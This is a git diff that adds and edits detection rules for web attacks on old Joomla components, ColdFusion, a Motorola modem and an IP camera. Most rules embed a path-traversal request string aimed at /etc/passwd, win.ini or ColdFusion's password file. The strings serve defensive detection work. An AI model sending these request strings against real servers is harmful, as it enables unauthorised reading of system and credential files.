https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html -- https://www.cvedetails.com/cve/CVE-2010-2033 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-2033:Joomla Percha Categories Tree 0.6 - Local File Inclusion +id: f953c147-a017-4f36-a20f-64c8bf4ec31a +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) + component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly + have unspecified other impact via a .. (dot dot) in the controller parameter to + index.php. +references: +- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html +- https://www.cvedetails.com/cve/CVE-2010-2033 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-2036.yaml b/rules/web/web_cve_CVE-2010-2036.yaml index b3132266..0057029c 100644 --- a/rules/web/web_cve_CVE-2010-2036.yaml +++ b/rules/web/web_cve_CVE-2010-2036.yaml @@ -1,26 +1,26 @@ -title: CVE-2010-2036:Joomla! Component Percha Fields Attach 1.0 - Directory Traversal -id: 1859e4d6-2965-4bee-897f-bded883e7364 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) - component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly - have unspecified other impact via a .. (dot dot) in the controller parameter to - index.php. -references: -- https://www.exploit-db.com/exploits/34004 -- https://www.cvedetails.com/cve/CVE-2010-2036 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-2036:Joomla! Component Percha Fields Attach 1.0 - Directory Traversal +id: 3036ae41-8549-429e-ba64-a3dd5991f7f2 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) + component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly + have unspecified other impact via a .. (dot dot) in the controller parameter to + index.php. +references: +- https://www.exploit-db.com/exploits/34004 +- https://www.cvedetails.com/cve/CVE-2010-2036 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-2259.yaml b/rules/web/web_cve_CVE-2010-2259.yaml index 3b175aca..2dd1e173 100644 --- a/rules/web/web_cve_CVE-2010-2259.yaml +++ b/rules/web/web_cve_CVE-2010-2259.yaml @@ -1,25 +1,25 @@ -title: CVE-2010-2259:Joomla! Component com_bfsurvey - Local File Inclusion -id: 0f74c630-3e11-41d3-8352-66961fc12085 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component - for Joomla! allows remote attackers to include and execute arbitrary local files - via a .. (dot dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/10946 -- https://www.cvedetails.com/cve/CVE-2010-2259 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-2259:Joomla! Component com_bfsurvey - Local File Inclusion +id: 9876750e-ffd6-41a6-9486-31f17db8ab87 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component + for Joomla! allows remote attackers to include and execute arbitrary local files + via a .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/10946 +- https://www.cvedetails.com/cve/CVE-2010-2259 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-2307.yaml b/rules/web/web_cve_CVE-2010-2307.yaml index 8d787692..221de5f3 100644 --- a/rules/web/web_cve_CVE-2010-2307.yaml +++ b/rules/web/web_cve_CVE-2010-2307.yaml @@ -1,27 +1,27 @@ -title: CVE-2010-2307:Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - - Directory Traversal -id: f03488dd-2c62-4541-9f0e-a11e8a7e1750 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Multiple directory traversal vulnerabilities in the web server for Motorola - SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow - remote attackers to read arbitrary files via (1) "//" (multiple leading slash), - (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. -references: -- https://www.securityfocus.com/bid/40550/info -- https://nvd.nist.gov/vuln/detail/CVE-2010-2307 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /../../etc/passwd - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-2307:Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM + - Directory Traversal +id: c2979f47-e361-4ce4-9f69-8a6a8bdf8916 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Multiple directory traversal vulnerabilities in the web server for Motorola + SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow + remote attackers to read arbitrary files via (1) "//" (multiple leading slash), + (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. +references: +- https://www.securityfocus.com/bid/40550/info +- https://nvd.nist.gov/vuln/detail/CVE-2010-2307 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /../../etc/passwd + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-2682.yaml b/rules/web/web_cve_CVE-2010-2682.yaml index 01a72dff..af009d5e 100644 --- a/rules/web/web_cve_CVE-2010-2682.yaml +++ b/rules/web/web_cve_CVE-2010-2682.yaml @@ -1,26 +1,26 @@ -title: CVE-2010-2682:Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion -id: 99824e58-3cce-4172-9970-04e0a6de5108 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) - component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and - possibly have unspecified other impact via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://www.exploit-db.com/exploits/14017 -- https://www.cvedetails.com/cve/CVE-2010-2682 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-2682:Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion +id: a6e33159-2c73-4bde-b40c-cf013d639d8c +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) + component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://www.exploit-db.com/exploits/14017 +- https://www.cvedetails.com/cve/CVE-2010-2682 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-2861.yaml b/rules/web/web_cve_CVE-2010-2861.yaml index e5764559..57ec00fa 100644 --- a/rules/web/web_cve_CVE-2010-2861.yaml +++ b/rules/web/web_cve_CVE-2010-2861.yaml @@ -1,27 +1,27 @@ -title: CVE-2010-2861:Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI -id: e22f6ee2-341a-44b8-a58b-33a0960fa8e0 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Multiple directory traversal vulnerabilities in the administrator console - in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files - via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, - (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm - in CFIDE/administrator/. -references: -- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 -- http://www.adobe.com/support/security/bulletins/apsb10-18.html -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-2861:Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI +id: 422116aa-40e3-4e44-a32f-b6c6f5855200 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Multiple directory traversal vulnerabilities in the administrator console + in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files + via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, + (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm + in CFIDE/administrator/. +references: +- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 +- http://www.adobe.com/support/security/bulletins/apsb10-18.html +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-3426.yaml b/rules/web/web_cve_CVE-2010-3426.yaml index d0c9a6c0..e6d0e930 100644 --- a/rules/web/web_cve_CVE-2010-3426.yaml +++ b/rules/web/web_cve_CVE-2010-3426.yaml @@ -1,23 +1,23 @@ -title: CVE-2010-3426:Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion -id: 8df31def-3d71-4f01-85ab-4891fa481a8c -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) - component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute - arbitrary local files via a .. (dot dot) in the controller parameter to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-3426:Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion +id: 542e1a33-d6b0-4843-9a27-ad846c2daf22 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) + component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute + arbitrary local files via a .. (dot dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-4231.yaml b/rules/web/web_cve_CVE-2010-4231.yaml index 9863413f..436138ed 100644 --- a/rules/web/web_cve_CVE-2010-4231.yaml +++ b/rules/web/web_cve_CVE-2010-4231.yaml @@ -1,25 +1,25 @@ -title: CVE-2010-4231:Camtron CMNC-200 IP Camera - Directory Traversal -id: e097e932-b39e-4e00-ac6f-1f03e43fc716 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. - The server is vulnerable to directory transversal attacks, allowing access to any - file on the camera file system. -references: -- https://nvd.nist.gov/vuln/detail/CVE-2010-4231 -- https://www.exploit-db.com/exploits/15505 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /../../../../../../../../../../../../../etc/passwd - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-4231:Camtron CMNC-200 IP Camera - Directory Traversal +id: aa46c601-90ce-48b3-b45e-c56eefd86134 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. + The server is vulnerable to directory transversal attacks, allowing access to any + file on the camera file system. +references: +- https://nvd.nist.gov/vuln/detail/CVE-2010-4231 +- https://www.exploit-db.com/exploits/15505 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /../../../../../../../../../../../../../etc/passwd + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-4617.yaml b/rules/web/web_cve_CVE-2010-4617.yaml index 5a1a42e0..f925c853 100644 --- a/rules/web/web_cve_CVE-2010-4617.yaml +++ b/rules/web/web_cve_CVE-2010-4617.yaml @@ -1,25 +1,25 @@ -title: CVE-2010-4617:Joomla! Component JotLoader 2.2.1 - Local File Inclusion -id: 3965e578-e509-41e2-a572-12522bbcf4fd -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the JotLoader (com_jotloader) component - 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory - traversal sequences in the section parameter to index.php. -references: -- https://www.exploit-db.com/exploits/15791 -- https://www.cvedetails.com/cve/CVE-2010-4617 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-4617:Joomla! Component JotLoader 2.2.1 - Local File Inclusion +id: 44d2ed53-964a-420c-a410-c4d44356a0f4 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the JotLoader (com_jotloader) component + 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory + traversal sequences in the section parameter to index.php. +references: +- https://www.exploit-db.com/exploits/15791 +- https://www.cvedetails.com/cve/CVE-2010-4617 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-5278.yaml b/rules/web/web_cve_CVE-2010-5278.yaml index 3618fefc..e8c0a733 100644 --- a/rules/web/web_cve_CVE-2010-5278.yaml +++ b/rules/web/web_cve_CVE-2010-5278.yaml @@ -1,26 +1,26 @@ -title: CVE-2010-5278:MODx manager - Local File Inclusion -id: 5f6499cc-97a6-49ed-af28-00278c2c954e -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php - in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, - allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key - parameter. -references: -- https://www.exploit-db.com/exploits/34788 -- https://www.cvedetails.com/cve/CVE-2010-5278 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-5278:MODx manager - Local File Inclusion +id: 0ed9f57e-d400-4f95-aaa4-6356b8e7eaeb +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php + in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, + allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key + parameter. +references: +- https://www.exploit-db.com/exploits/34788 +- https://www.cvedetails.com/cve/CVE-2010-5278 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical From 121c30e516adf28a20de8a84814c55c84bdc5adc Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Wed, 25 Aug 2021 21:27:59 +0530 Subject: [PATCH 0578/1367] Changed Author to author --- rules/web/web_cve_CVE-2010-0943.yaml | 4 ++-- rules/web/web_cve_CVE-2010-0944.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1306.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1314.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1345.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1353.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1474.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1475.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1495.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1532.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1533.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1535.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1602.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1657.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1718.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1722.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1875.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1953.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1954.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1955.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1979.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1983.yaml | 4 ++-- rules/web/web_cve_CVE-2010-2033.yaml | 4 ++-- rules/web/web_cve_CVE-2010-2036.yaml | 4 ++-- rules/web/web_cve_CVE-2010-2259.yaml | 4 ++-- rules/web/web_cve_CVE-2010-2307.yaml | 4 ++-- rules/web/web_cve_CVE-2010-2682.yaml | 4 ++-- rules/web/web_cve_CVE-2010-2861.yaml | 4 ++-- rules/web/web_cve_CVE-2010-3426.yaml | 4 ++-- rules/web/web_cve_CVE-2010-4231.yaml | 4 ++-- rules/web/web_cve_CVE-2010-4617.yaml | 4 ++-- rules/web/web_cve_CVE-2010-5278.yaml | 4 ++-- 32 files changed, 64 insertions(+), 64 deletions(-) diff --git a/rules/web/web_cve_CVE-2010-0943.yaml b/rules/web/web_cve_CVE-2010-0943.yaml index 59e19742..07b40e00 100644 --- a/rules/web/web_cve_CVE-2010-0943.yaml +++ b/rules/web/web_cve_CVE-2010-0943.yaml @@ -1,6 +1,6 @@ title: CVE-2010-0943:Joomla! Component com_jashowcase - Directory Traversal -id: 6a99f28f-8626-4419-93c8-9aa9e75c0068 -Author: Subhash Popuri (@pbssubhash) +id: e5616a8c-a43e-47c2-9fd2-19b429581b90 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) diff --git a/rules/web/web_cve_CVE-2010-0944.yaml b/rules/web/web_cve_CVE-2010-0944.yaml index 2872b219..eb080266 100644 --- a/rules/web/web_cve_CVE-2010-0944.yaml +++ b/rules/web/web_cve_CVE-2010-0944.yaml @@ -1,6 +1,6 @@ title: CVE-2010-0944:Joomla! Component com_jcollection - Directory Traversal -id: ae369f4d-5f22-4969-8715-c8908394f279 -Author: Subhash Popuri (@pbssubhash) +id: c3eada81-1f9a-4a55-97b8-d3207d89228e +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the JCollection (com_jcollection) diff --git a/rules/web/web_cve_CVE-2010-1306.yaml b/rules/web/web_cve_CVE-2010-1306.yaml index 2b48098e..1a6e6268 100644 --- a/rules/web/web_cve_CVE-2010-1306.yaml +++ b/rules/web/web_cve_CVE-2010-1306.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1306:Joomla! Component Picasa 2.0 - Local File Inclusion -id: 3cea101d-f72d-441f-8fdc-8462cfac20e7 -Author: Subhash Popuri (@pbssubhash) +id: 560cd98d-aa1d-451b-90a5-08ce5ab72d7b +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component diff --git a/rules/web/web_cve_CVE-2010-1314.yaml b/rules/web/web_cve_CVE-2010-1314.yaml index 8673ae89..e36b0aca 100644 --- a/rules/web/web_cve_CVE-2010-1314.yaml +++ b/rules/web/web_cve_CVE-2010-1314.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1314:Joomla! Component Highslide 1.5 - Local File Inclusion -id: 9a7d17b2-ba50-4f83-bd75-92bcb0ba190f -Author: Subhash Popuri (@pbssubhash) +id: 18019647-a68c-412a-bca9-626618b1a79c +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) diff --git a/rules/web/web_cve_CVE-2010-1345.yaml b/rules/web/web_cve_CVE-2010-1345.yaml index 29326297..6c3fe8c8 100644 --- a/rules/web/web_cve_CVE-2010-1345.yaml +++ b/rules/web/web_cve_CVE-2010-1345.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1345:Joomla! Component Cookex Agency CKForms - Local File Inclusion -id: dc5198bb-73cc-4a07-8b6c-b178d6c25265 -Author: Subhash Popuri (@pbssubhash) +id: e70e977a-aaf3-4ec1-a948-493caea7cff3 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) diff --git a/rules/web/web_cve_CVE-2010-1353.yaml b/rules/web/web_cve_CVE-2010-1353.yaml index 772094e3..a1c006bd 100644 --- a/rules/web/web_cve_CVE-2010-1353.yaml +++ b/rules/web/web_cve_CVE-2010-1353.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1353:Joomla! Component LoginBox - Local File Inclusion -id: ad0a798b-87d2-4701-82d4-f7a253e44d69 -Author: Subhash Popuri (@pbssubhash) +id: 559e6e69-af61-407c-9949-a8602cfb6d95 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) diff --git a/rules/web/web_cve_CVE-2010-1474.yaml b/rules/web/web_cve_CVE-2010-1474.yaml index a9d56934..c023e301 100644 --- a/rules/web/web_cve_CVE-2010-1474.yaml +++ b/rules/web/web_cve_CVE-2010-1474.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1474:Joomla! Component Sweetykeeper 1.5 - Local File Inclusion -id: 1248cb2d-f96a-49a0-83b0-c1e2c74ae397 -Author: Subhash Popuri (@pbssubhash) +id: 06040396-89e0-4919-a186-a3ac48eb2d85 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) diff --git a/rules/web/web_cve_CVE-2010-1475.yaml b/rules/web/web_cve_CVE-2010-1475.yaml index 465857ed..5d2fb64e 100644 --- a/rules/web/web_cve_CVE-2010-1475.yaml +++ b/rules/web/web_cve_CVE-2010-1475.yaml @@ -1,7 +1,7 @@ title: CVE-2010-1475:Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion -id: 5cf9e456-3c79-4d1c-a926-a5a2d20b6f26 -Author: Subhash Popuri (@pbssubhash) +id: 568d0a33-0052-47bc-a04e-8f7e8f05e12d +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) diff --git a/rules/web/web_cve_CVE-2010-1495.yaml b/rules/web/web_cve_CVE-2010-1495.yaml index db0c2483..b3340862 100644 --- a/rules/web/web_cve_CVE-2010-1495.yaml +++ b/rules/web/web_cve_CVE-2010-1495.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1495:Joomla! Component Matamko 1.01 - Local File Inclusion -id: 807aa121-81eb-418f-9bbb-a215d8c6f0e7 -Author: Subhash Popuri (@pbssubhash) +id: cb3ac5e3-de9e-44b7-b0f5-b18a13ba3c69 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Matamko (com_matamko) component diff --git a/rules/web/web_cve_CVE-2010-1532.yaml b/rules/web/web_cve_CVE-2010-1532.yaml index 76359b0d..d80c1a20 100644 --- a/rules/web/web_cve_CVE-2010-1532.yaml +++ b/rules/web/web_cve_CVE-2010-1532.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1532:Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion -id: 3f5ed59b-1944-4325-b675-5ea2441069f1 -Author: Subhash Popuri (@pbssubhash) +id: ea2cd3fd-60fc-4945-be6d-e69340a0159d +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) diff --git a/rules/web/web_cve_CVE-2010-1533.yaml b/rules/web/web_cve_CVE-2010-1533.yaml index d0566b2f..1a181a6a 100644 --- a/rules/web/web_cve_CVE-2010-1533.yaml +++ b/rules/web/web_cve_CVE-2010-1533.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1533:Joomla! Component TweetLA 1.0.1 - Local File Inclusion -id: fb9d6f93-d5ce-45e5-abf4-51b092d082a2 -Author: Subhash Popuri (@pbssubhash) +id: fc58d241-5812-4a66-acad-2c9370fc2975 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the TweetLA (com_tweetla) component diff --git a/rules/web/web_cve_CVE-2010-1535.yaml b/rules/web/web_cve_CVE-2010-1535.yaml index 3f94a2df..80029d7f 100644 --- a/rules/web/web_cve_CVE-2010-1535.yaml +++ b/rules/web/web_cve_CVE-2010-1535.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1535:Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion -id: 74d51ae3-410b-4654-bb2d-20cca140a39c -Author: Subhash Popuri (@pbssubhash) +id: a4abca47-5c67-4b8c-a549-4e04f43ce751 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) diff --git a/rules/web/web_cve_CVE-2010-1602.yaml b/rules/web/web_cve_CVE-2010-1602.yaml index 6703b9a5..aba67724 100644 --- a/rules/web/web_cve_CVE-2010-1602.yaml +++ b/rules/web/web_cve_CVE-2010-1602.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1602:Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion -id: 78b8be95-2dac-4660-867b-3096670f1801 -Author: Subhash Popuri (@pbssubhash) +id: 25e8e854-0a76-4f55-9b7a-9769ea2dbebc +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) diff --git a/rules/web/web_cve_CVE-2010-1657.yaml b/rules/web/web_cve_CVE-2010-1657.yaml index 8cc04a14..1772f0c8 100644 --- a/rules/web/web_cve_CVE-2010-1657.yaml +++ b/rules/web/web_cve_CVE-2010-1657.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1657:Joomla! Component SmartSite 1.0.0 - Local File Inclusion -id: 1b858384-5226-47df-beb9-d9162c63b0da -Author: Subhash Popuri (@pbssubhash) +id: 4fbedbee-ea11-4a65-9c25-bbb0d74f58fe +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory 